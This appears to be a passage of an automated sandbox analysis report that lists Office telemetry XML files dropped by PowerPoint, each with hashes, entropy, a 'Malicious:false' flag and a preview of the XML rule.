                                                                                                                              SHA-256:67D008FD54527348F2344E7B9FDCE6966E3023A9194F90493260ADA9A8893276
                                                                                                                              SHA-512:3621745FA260ACEA65FCA1B2A2643F6EBA3E9E2811970DF3E48776D25508768F78566AA13C4DA4AD10521A5461885854472F29340334DA69443D6344DEB415C0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170060" V="1" DC="SM" EN="Office.Graphics.D2D1Usage" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bqo3s" />.. </S>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):841
                                                                                                                              Entropy (8bit):4.495890781581802
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS0NkoCAvQier0XFJiQjE+kXqNOjPNewHYH/M//jrM5eNX/c//QQnpONG/RX3:2d3GHAvcrgv5vTAPuaTDQD7
                                                                                                                              MD5:68EE80CC790475D0324B760479ADE7C2
                                                                                                                              SHA1:1F29347A4C3CF4EB37C9815B7B8F37077DC9FA1C
                                                                                                                              SHA-256:3AFBF730CDE57543EB757FB2BBF16C7E5DEF85AE6C677978FAB68EC35AE22B71
                                                                                                                              SHA-512:08FA58FE2CF920DE42AE3FFF3C5A2233271F0A6DDADF379D5EC6274D8C29ABFEA25845339E0592671DEFB35BF7AFCCC232A590287B801C8B7AF74515CAB7F5D6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170061" V="5" DC="SM" EN="Office.Graphics.SVGLoad" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aqww0" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. <F T="4">.. <O T="EQ">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="IsSVG" M="Ignore" />.. </L>.. <R>.. <V V="False" T="B" />.. </R>.. </O>.. </L>.. <R>.. <V V="True" T="B" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="false" N="SVGCount">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="3" />.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):390
                                                                                                                              Entropy (8bit):5.131476606472836
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSeYyYs7koCAvQier5zQyXjXHaSMNO2su:2dIyYs4HAvcr7jK
                                                                                                                              MD5:453F813F8061FDF2468715C5B436D33E
                                                                                                                              SHA1:CDC81168A525E48B9E26B8D6A0F22AB55B032BFF
                                                                                                                              SHA-256:61D2BF8CBAAC280BD902DA9AF9321DC86838980D5A6CEBA4EF51F404DDF3C139
                                                                                                                              SHA-512:6B547FD81C7D26049EE8B43B82A3026C47EDD3BA0CD453B5BCA631A8F3F2BBB1772FAC9A1E1130F8F7E9B5C9D92939287EB6CF4792D244A83F64E1598D30898C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170065" V="0" DC="SM" EN="Office.Graphics.StencilOutside" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="brl93" />.. </S>.. <C T="U32" I="0" O="true" N="StencilOutsideCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):412
                                                                                                                              Entropy (8bit):5.224378013807265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSro9koCAvQierQzQyN3OXHaSMNO2su:2dwoWHAvcri+K
                                                                                                                              MD5:59BB827938E1CD1AF3A044EF54EE7DFE
                                                                                                                              SHA1:BEF188770E9F2AA713411AC71F3FC0638FF190D4
                                                                                                                              SHA-256:03AF34634250F6AE4DB15EB9B406AEC8943EA3B3C442C44C0052FEF9D3B62BA2
                                                                                                                              SHA-512:E6A419D743F7FB15D8A43FAE0635BD812EC12CDE701D1D0EC565026049EBAE88734916377EF1BA31B6854697FF14D7A0A177864CB014EB1AA3CC63C0272AF57F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170068" V="0" DC="SM" EN="Office.Graphics.StencilNotOnInkBackground" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boipy" />.. </S>.. <C T="U32" I="0" O="true" N="StencilNotOnInkBackgroundCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):523
                                                                                                                              Entropy (8bit):5.056234104340099
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSHokoCAvQierCXFJiQjFbywXHaSMNO5AHNUlu:2dUvHAvcrav5307
                                                                                                                              MD5:F441F1D65A76ED4A331E1B767E846595
                                                                                                                              SHA1:458219D0DD102330135C5191BEB055F0955B78C2
                                                                                                                              SHA-256:E4BAE3A55AB1BCD4CA9B7474F4397C5AED099D99D89489A32D7AAD694440C546
                                                                                                                              SHA-512:50C006C23031DA0F4C87F3E753F8AA520259770871C97632D1D728725C4740DF6357DBD4A7390CA95634E89BF69E9C3B50C1D087E6864C372D6FCCC59D94F1E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170069" V="1" DC="SM" EN="Office.Graphics.StencilInkStroke" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boip0" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="StencilInkStrokeCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):552
                                                                                                                              Entropy (8bit):5.088954158136153
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS5gUlGkpkoCAvQierZzGi0dLzNfI6UVxnt9tIDNO2su:2dogaGkiHAvcrY/N2Va
                                                                                                                              MD5:029E6A810B2F854148580D95CA2D9C47
                                                                                                                              SHA1:D18E0932AB2AA8DEE6C46D384FE6EF60D0BE3B25
                                                                                                                              SHA-256:7564DFF5CE0D2FFEB8C59E9ABF44FFCE50BFA871ED2FB283D91295FCA45FF931
                                                                                                                              SHA-512:43CB65DC5DD773D2111D74DE2FD9E6D2D3BBD061D68468E63141EE262A8EEEAC0A8495C4394A135440233D9107445BD039E50F1D234BE1B8C720FDF7CBC910F2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170070" V="2" DC="SM" EN="Office.Graphics.StencilCommitedData" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="blnis" />.. </S>.. <C T="U32" I="0" O="true" N="SeqId">.. <S T="1" F="seqId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="InkDeviceType">.. <S T="1" F="InkDeviceType" />.. </C>.. <C T="B" I="2" O="true" N="Init">.. <S T="1" F="Init" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):669
                                                                                                                              Entropy (8bit):5.062611791411667
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSrvG2koCAvQier8HszVYaGSTwdy9zNfI6U3nstIDNO2su:2dgvGJHAvcr8HnYN2b
                                                                                                                              MD5:9AF04E8D2912B44561AFB4053EF8442F
                                                                                                                              SHA1:250F6ED1BC87E54562854B859037C1180F82F77E
                                                                                                                              SHA-256:1A116F74E5589A0733C80855AC7EC12385DF649D647A4BAC2C0CD4D0769E8BEA
                                                                                                                              SHA-512:9BB78D60B065F7A72E624B6B977A4BE956155C502BF88462BC883678DBD985396783A22EFFCFAA61E8706DC34F564F1F6E92D826988375333F6EB7821CB999FF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170071" V="2" DC="SM" EN="Office.Graphics.StencilFailCommit" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boipf" />.. </S>.. <C T="U32" I="0" O="true" N="ToCommitSeqId">.. <S T="1" F="toCommitSeqId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="CurSeqId">.. <S T="1" F="curSeqId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="InkDeviceType">.. <S T="1" F="InkDeviceType" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="Init">.. <S T="1" F="Init" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):392
                                                                                                                              Entropy (8bit):5.210519152134
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mEpkyeuqb0c7oCDLChvRCUHperhbGHkdsVlrcyRO/SXRI9NOn2sby:TMHdSEXpkoCAvQiergHSsQyA2iNO2su
                                                                                                                              MD5:D3A6D8A89D8BE3869FE9B0CA699D6D0C
                                                                                                                              SHA1:E4424D8FD76B28A50DABDFE6F2E056CFA3680A5D
                                                                                                                              SHA-256:7C9092161E7C3CD21D98D69C5263CBBA6EAA5C009DC6044AA9D9A3655773ACD6
                                                                                                                              SHA-512:43C35028B75E615D1A7EAABC33E081E24EBD6638C4C81CCDACE825806D07A6278469F6BC8C9C425BE5814F6038193D27659FEDDFB80F034B2F84A14456224B3D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170072" V="2" DC="SM" EN="Office.Graphics.StencilInkMode" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boipz" />.. </S>.. <C T="W" I="0" O="true" N="StencilInkMode">.. <S T="1" F="StencilInkMode" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):597
                                                                                                                              Entropy (8bit):5.138112127312645
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdShXLg8rkoCAvQierwHFAoszFMdL75fuDnt9tIDNO2su:2d6XmHAvcrWNPBh
                                                                                                                              MD5:9C84BA54DAFBF134E47668AD72141159
                                                                                                                              SHA1:533D83E75AEDAC2D9BDF20C424DB0A75AAA6FF0A
                                                                                                                              SHA-256:5532D3A3E16A6853C8A242611771EACB2FA8616AC190FB2E849FF9C2307B3251
                                                                                                                              SHA-512:A0571B50AEA77FD8713A755132AADFFB171AA19868B6F7A7BA5EAE31194352BF1056C217B753D500380EE9CCA2B2B4F5B85560359B4CC3B01161C4A5AF1A4B24
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170073" V="2" DC="SM" EN="Office.Graphics.StencilDeviceChangeNC" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boipj" />.. </S>.. <C T="U32" I="0" O="true" N="CommitedSeqId">.. <S T="1" F="commitedSeqId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="CommitedInkDeviceType">.. <S T="1" F="CommitedInkDeviceType" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="Init">.. <S T="1" F="Init" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):589
                                                                                                                              Entropy (8bit):5.121041291659901
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSqXLSrkoCAvQiersXzf8dLzNfI6U3nt9tIDNO2su:2dxXvHAvcrsE/N2s
                                                                                                                              MD5:ACACCBA8B2FF3E481E6274C8DDF86265
                                                                                                                              SHA1:E4C85C358FB78932A42A2D58B335EAEF76C9C037
                                                                                                                              SHA-256:3BD8A6506CCCF1C83487B04FEC9206A90096F5819F8169CD745ADEE35E1C8352
                                                                                                                              SHA-512:34D52213FF8AAC90D9F77B2921FE29A2D6631638C29BB45D10B0BF93DED2606553D7DC9D00012EFAE9EE42600C99D4219C0BA77EA3D6AF35C6E32E1F5BC87428
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170074" V="2" DC="SM" EN="Office.Graphics.StencilDeviceChange" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="boipk" />.. </S>.. <C T="U32" I="0" O="true" N="ToCommitSequenceId">.. <S T="1" F="toCommitSequenceId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="InkDeviceType">.. <S T="1" F="InkDeviceType" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="Init">.. <S T="1" F="Init" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):933
                                                                                                                              Entropy (8bit):5.028116295023816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS7VdkoCAvQierIYA+jPntbKNx1X5S9gN1DyDuMMIfxxT/OdyNO2su:2dKV2HAvcrIG4zT1yhbZJ/2i
                                                                                                                              MD5:9DAEF7923371590B4F64CB407531EABE
                                                                                                                              SHA1:4A370B97B71598D3FE517A2C6E34F4F56BD2B6F0
                                                                                                                              SHA-256:C5DFF11E28772228F0AE0C7F8F82577B72EAB8CA5814CDF65ECC89D0A14914DF
                                                                                                                              SHA-512:282DC8EEFBFDB6AAA4160D0349BD5476848FD9DAD1EB85626D1CE87F8EDB3BDC8850C239411E09483D8DAA03F5B806F4D5FFBECBF0E23CE0FB3E7D8E34056734
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170075" V="2" DC="SM" EN="Office.Graphics.FailedIBitmap" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="br19m" />.. </S>.. <C T="G" I="0" O="false" N="OriginalPixelFormat">.. <S T="1" F="Original pixel format" />.. </C>.. <C T="G" I="1" O="false" N="ConvertedPixelFormat">.. <S T="1" F="Converted pixel format" />.. </C>.. <C T="B" I="2" O="false" N="FailedToGetInfo">.. <S T="1" F="Failed to get IWicBitmapSource info" />.. </C>.. <C T="U32" I="3" O="false" N="PixelWidth">.. <S T="1" F="Pixel width" />.. </C>.. <C T="U32" I="4" O="false" N="PixelHeight">.. <S T="1" F="Pixel height" />.. </C>.. <C T="D" I="5" O="false" N="DpiX">.. <S T="1" F="DpiX" />.. </C>.. <C T="D" I="6" O="false" N="DpiY">.. <S T="1" F="DpiY" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):385
                                                                                                                              Entropy (8bit):5.186798035649007
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mXlkVVJb0c7oCDLChvRCUHperhdpJrCZXM7yXPfPSSMNOn2sby:TMHdSM4koCAvQiervXQMOXHaSMNO2su
                                                                                                                              MD5:EB1BB018005D0815CB8B4F1FC2B80106
                                                                                                                              SHA1:0048EC35F47126354A48C8776200370639418AEA
                                                                                                                              SHA-256:1A964F5C2E73E643490A7F2E328A2EA595CAB319B58E694BA60212BE25048548
                                                                                                                              SHA-512:913E7D2CA97F3F27B8673BF3CF21B785AA699D9A077744AA6699F5CAF4974A664060694671BF85F312CF6C21CD3BA93C914F65DF9AC63083B1BF5B75E61BB1EE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170076" V="1" DC="SM" EN="Office.Graphics.NoHWAdapter" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjghy" />.. </S>.. <C T="U32" I="0" O="false" N="NoHWAdapterCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):389
                                                                                                                              Entropy (8bit):5.237558642548256
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7md4kD1mab0c7oCDLChvRCUHperhpkdsVlrfnst/+sgs9NOn2sby:TMHdSXs7koCAvQierqsznG/+8NO2su
                                                                                                                              MD5:7854904FC54F3C9DE80FF7B286464A29
                                                                                                                              SHA1:3E46A0326B60ACC372040D71FAF070970123768D
                                                                                                                              SHA-256:47B200E4CC615DD90F7007B058233ACB19B3AF1FF4CBC8E9F4DA0BE23655D6AD
                                                                                                                              SHA-512:46C4C6C8C6CC2388FEB70716331501B480E8D0D263791007B1A8C164C024A4465FF4BED423835994584487B60AA0E69BB3D83E1316E0615B84BB5B5FFCA9FBE0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170077" V="1" DC="SM" EN="Office.Graphics.InsertModel3D" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvqvh" />.. </S>.. <C T="W" I="0" O="true" N="FileExtension">.. <S T="1" F="FileExtension" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):483
                                                                                                                              Entropy (8bit):5.20477265199328
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS2JVm7koCAvQqAQierSN/UzaTbIONO2su:2dFJ9HAvfrSNMUF
                                                                                                                              MD5:77842042E86E179DE7F53F59C53DDB80
                                                                                                                              SHA1:5C8214887638A179ACF9336CC029E3CECAE7C72B
                                                                                                                              SHA-256:EEFD868E1F334CC8508C01406642B747ECA2C0C47E1A0085C55BAE840993549D
                                                                                                                              SHA-512:63F8E464865E10042B4A11B6914F1DC4388ABF4F60A42EC6D7B7A80E24BDEF84F4307233D906BA81BBDEB1F2D16E28F4D5EAF4706110C63AD055B1B5A2CF71CE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170078" V="2" DC="SM" EN="Office.Graphics.LoadModel3D" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvqwc" />.. </S>.. <C T="W" I="0" O="false" N="Function">.. <S T="1" F="ULS_Message" />.. </C>.. <C T="U32" I="1" O="true" N="ModelID">.. <S T="1" F="ID" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):385
                                                                                                                              Entropy (8bit):5.158593051010716
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mlSkDoab0c7oCDLChvRCUHperhXbpJrCI2R2NyXPfPSSMNOn2sby:TMHdSl/o7koCAvQierZM2EXHaSMNO2su
                                                                                                                              MD5:3718893E33DADAF2FBEFAE3AA0987060
                                                                                                                              SHA1:A358B0A5F30D9158C2C9B071023A88497F82421D
                                                                                                                              SHA-256:A719458C889BC9CE96EC6C757D795E2C6B1F7DE677A96DB8908F1F3E617E3F50
                                                                                                                              SHA-512:92C5B54733F6A9393D8C2C7A6688C27D87D0C6AFD20B3DF7EC7E7EF0753E59E5A6FF8901A0A5C4853BCC6DE137AD51D723C3B2848A866A394D6CBFB8C7572C24
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170080" V="1" DC="SM" EN="Office.Graphics.CopyModel3D" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvqvg" />.. </S>.. <C T="U32" I="0" O="false" N="CopyModel3DCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):547
                                                                                                                              Entropy (8bit):5.004801070488056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSI6Kk3rkoCAvQierAr7PNWY6Nxf/0//Y6PdYhmMNO2su:2dB6/3IHAvcrAPeN2U
                                                                                                                              MD5:9B13021DF6AB7D65B95F9DA9BB6E9BA9
                                                                                                                              SHA1:E75B3A47425B822BC8A1BD33FC4C7F902E54801B
                                                                                                                              SHA-256:E4DC795238F92060F56E1BF556E389CE011EB3C6597E0698BB3550F005E400C3
                                                                                                                              SHA-512:08125CA3A3F953812152772497F83B68DFB063C1078F955BBACFFAAD52D9C8B644F11A0E7988ABEB57E2C3D15487D8A7BB4661190A44F542D28DCC40CD11C89C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170081" V="2" DC="SM" EN="Office.Graphics.InkEffects" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0tof" A="bvuie coukr" />.. </S>.. <C T="G" I="0" O="false" N="InkEffect">.. <O T="COALESCE">.. <L>.. <S T="1" F="Ink Effect GUID" M="Ignore" />.. </L>.. <R>.. <S T="1" F="Ink Effect GUID for new ink" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):403
                                                                                                                              Entropy (8bit):5.157378070735827
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mn2FkSHxYb0c7oCDLChvRCUHperhyHfWNkJrC6HFyXPfPSSMNOn2sby:TMHdSuH7koCAvQierEhGXHaSMNO2su
                                                                                                                              MD5:111C82FE49A9189C7F817C42FD7872AC
                                                                                                                              SHA1:A3428A440FCB1C94308488CA5EDAABF0B125FECD
                                                                                                                              SHA-256:CDFDE66806DF095450C741B27F391227F0D307CB1C7AE36AEEDD7A4BAC828223
                                                                                                                              SHA-512:9E7F5C520A9178899CD01E0243C7BC3E82246BCCBD77A082A946740B6F14CEC1643B38C34D06A6904D5481E4C221E9DB0578B1AA30E5C46509526ADA5F386498
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170082" V="1" DC="SM" EN="Office.Graphics.LoadDefaultPens" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvtft" A="bz4a6" />.. </S>.. <C T="U32" I="0" O="false" N="LoadDefaultPensCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1087
                                                                                                                              Entropy (8bit):4.941903364756859
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSrRkoCAvQierbGF0tt/UzZ66OIPkM96AXIla4Rlf4jHxp5onvxDoy5uiEGsz:2dQaHAvcr80ttMcJACl0HmNrRRDHO
                                                                                                                              MD5:980BF1495AA145A06E8E27D11899F7E3
                                                                                                                              SHA1:1B565E8373E31992DADD6AE2C73E915A07F448E4
                                                                                                                              SHA-256:40628F65FEDB6C3646ABD802CB8DB6F6CA6E9D11289DB66C7EAB862FED8A196D
                                                                                                                              SHA-512:C681CEF19FED5295128B13D68226712E03D77EA169EF5AA95078A3820506E4EA6BEA71688A1788546027C701BBD12AA52E02C27AF7F53C4804AAB4571495B60A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170083" V="6" DC="SM" EN="Office.Graphics.RoamingPen" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvtfz" A="bz4bc b50fz b3wfp clf2y" />.. </S>.. <C T="W" I="0" O="false" N="Action">.. <S T="1" F="ULS_Message" />.. </C>.. <C T="U64" I="1" O="true" N="Item">.. <S T="1" F="Item" M="Ignore" />.. </C>.. <C T="U64" I="2" O="true" N="ItemCount">.. <S T="1" F="Count" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Type">.. <S T="1" F="Type" M="Ignore" />.. </C>.. <C T="F" I="4" O="true" N="Thickness">.. <S T="1" F="Thickness" M="Ignore" />.. </C>.. <C T="I8" I="5" O="true" N="RGB_R">.. <S T="1" F="RGB_R" M="Ignore" />.. </C>.. <C T="I8" I="6" O="true" N="RGB_G">.. <S T="1" F="RGB_G" M="Ignore" />.. </C>.. <C T="I8" I="7" O="true" N="RGB_B">.. <S T="1" F="RGB_B" M="Ignore" />.. </C>.. <C T="U32" I="8" O="true" N="Effect"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):837
                                                                                                                              Entropy (8bit):4.935067632892513
